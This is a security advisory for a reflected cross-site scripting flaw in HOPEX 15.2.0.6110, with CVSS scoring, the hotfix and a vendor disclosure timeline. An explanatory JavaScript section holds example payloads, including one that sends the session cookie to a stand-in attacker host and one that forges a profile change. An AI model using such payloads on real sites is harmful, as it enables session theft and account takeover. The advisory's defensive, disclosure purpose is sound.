CVE-2022-38481

by mrahier96

Abstract Advisory Information

The application is prone to reflected Cross-site Scripting (XSS) attacks in several features. An attacker who gets a user to open a crafted link can execute script in that user's browser session, perform actions on their behalf and exfiltrate data.
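As an added illustration (not code from this advisory or from HOPEX), the JavaScript below shows the mechanism behind a reflected XSS finding of the kind described above: an unencoded reflection of a request parameter beside its encoded fix, two constructed payloads matching the stated impact (session exfiltration and a state-changing request made with the victim's credentials), and the check that separates the vulnerable handler from the fixed one. The search feature, the `q` parameter, the `/api/profile` endpoint and the `hopex.example` / `attacker.example` hosts are hypothetical stand-ins, not details from the advisory.

```javascript
// Added illustration, not HOPEX code: how a reflected XSS sink arises and
// how output encoding closes it. The "search" feature, the q parameter,
// the /api/profile endpoint and the hostnames are hypothetical.

// Encode a string for insertion into an HTML text or double-quoted
// attribute context. Other contexts (JavaScript, URL, CSS) need their own
// encoders; this one is not sufficient there.
function encodeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable handler: the request parameter is reflected verbatim into the
// response body, so any markup in it is parsed by the victim's browser.
function renderSearchVulnerable(q) {
  return `<p>Results for: ${q}</p>`;
}

// Fixed handler: identical, except the untrusted value is encoded for the
// HTML context it lands in.
function renderSearchFixed(q) {
  return `<p>Results for: ${encodeHtml(q)}</p>`;
}

// Constructed proof-of-concept payloads of the kind used in a report.
// The first exfiltrates the session cookie; the second performs a
// state-changing request with the victim's credentials.
const EXFIL_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/c?\'+encodeURIComponent(document.cookie))">';
const ACTION_PAYLOAD =
  '<img src=x onerror="fetch(\'/api/profile\',{method:\'POST\',credentials:\'include\',body:\'email=attacker@attacker.example\'})">';

// A reflection is exploitable when the payload survives into the response
// unencoded. This is the check a reporter (or a regression test) would run.
function isReflectedUnencoded(render, payload) {
  return render(payload).includes(payload);
}

// Build the link a victim would be sent. URLSearchParams percent-encodes the
// payload for transport; the server decodes it before reflecting it, so the
// encoding here does nothing to protect the page.
function buildPocUrl(base, param, payload) {
  const url = new URL(base);
  url.searchParams.set(param, payload);
  return url.toString();
}

// Run both handlers against both payloads and report which reflections
// are live.
function assessHandlers() {
  const payloads = { exfil: EXFIL_PAYLOAD, action: ACTION_PAYLOAD };
  const result = {};
  for (const [name, payload] of Object.entries(payloads)) {
    result[name] = {
      vulnerable: isReflectedUnencoded(renderSearchVulnerable, payload),
      fixed: isReflectedUnencoded(renderSearchFixed, payload),
    };
  }
  return result;
}

console.log(assessHandlers());
console.log(buildPocUrl('https://hopex.example/search', 'q', EXFIL_PAYLOAD));
```

The victim has to open the crafted link, which is why the CVSS vector carries UI:R; once the script runs it is same-origin with the application, so a session cookie or an authenticated request is available to it. The fix is output encoding matched to the context the value lands in, applied at every reflection point rather than only the one in the report.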

Author: Elliot Rasch

Version affected

Name: HOPEX

Versions: 15.2.0.6110

Common Vulnerability Scoring System

6.1 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Patch

Hotfix V5CP2

Vulnerability Disclosure Timeline

  • 17/05/2022: Vulnerability discovered
  • 18/05/2022: Vulnerability reported to CERT-XLM
  • 19/05/2022: Vulnerability reported to vendor through contact form
  • 24/05/2022: Vulnerability reported to vendor through contact form again; account created on their support portal
  • 03/06/2022: Called vendor, who redirected us to a specific email address
  • 10/06/2022: Follow-up sent to the given email address
  • 17/06/2022: Follow-up sent to the given email address
  • 24/06/2022: Follow-up sent to the given email address
  • 24/06/2022: Contacted Technical Support Manager
  • 24/06/2022: Vendor acknowledged the report and gave us a point of contact
  • 01/07/2022: Follow-up sent to the Technical Support email address
  • 08/07/2022: Reminder sent to the Technical Support email address
  • 22/07/2022: Follow-up sent to the given helpdesk and security email addresses
  • 22/07/2022: Follow-up sent to a personal email address
  • 03/08/2022: Called vendor; asked reception to have IT recontact us
  • 19/08/2022: Update sent to all contact points we have
  • 19/08/2022: CVE ID requested from MITRE
  • 02/09/2022: CVE ID assigned: CVE-2022-38481
  • 14/09/2022: Vulnerability patched in V5CP2 Hotfix
  • 28/10/2022: Planned public disclosure